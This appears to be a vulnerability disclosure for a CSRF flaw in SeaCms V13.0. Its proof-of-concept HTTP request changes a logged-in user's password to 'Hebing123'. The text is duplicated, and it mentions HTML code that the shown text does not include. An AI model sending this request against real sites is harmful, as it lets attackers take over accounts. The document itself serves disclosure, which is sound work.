A Cross-Site Request Forgery (CSRF) vulnerability has been identified in SeaCms V13.0. This vulnerability allows an attacker to change a user's password without their consent by tricking them into visiting a malicious webpage.
POC
POST /member.php?action=chgpwdsubmit HTTP/1.1
Host: your-ip
Content-Length: 56
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h8inlct2j4b5efgecbfn6r5smr
Connection: close
email=x@x.x&nickname=&newpwd=Hebing123&newpwd2=Hebing123
By storing the above HTML code on any webpage, if a user visits the page, their password will be changed to "Hebing123" without their knowledge.
Due to the mechanism where the page returns to the previous page after personal information is modified, an attacker can not only change the password but also modify any other parameters and values, allowing for multiple attacks.
Hebing123
commented
3 months ago
Summary
A Cross-Site Request Forgery (CSRF) vulnerability has been identified in SeaCms V13.0. This vulnerability allows an attacker to change a user's password without their consent by tricking them into visiting a malicious webpage.
POC
Attack POC
Impact
By storing the above HTML code on any webpage, if a user visits the page, their password will be changed to "Hebing123" without their knowledge. Due to the mechanism where the page returns to the previous page after personal information is modified, an attacker can not only change the password but also modify any other parameters and values, allowing for multiple attacks.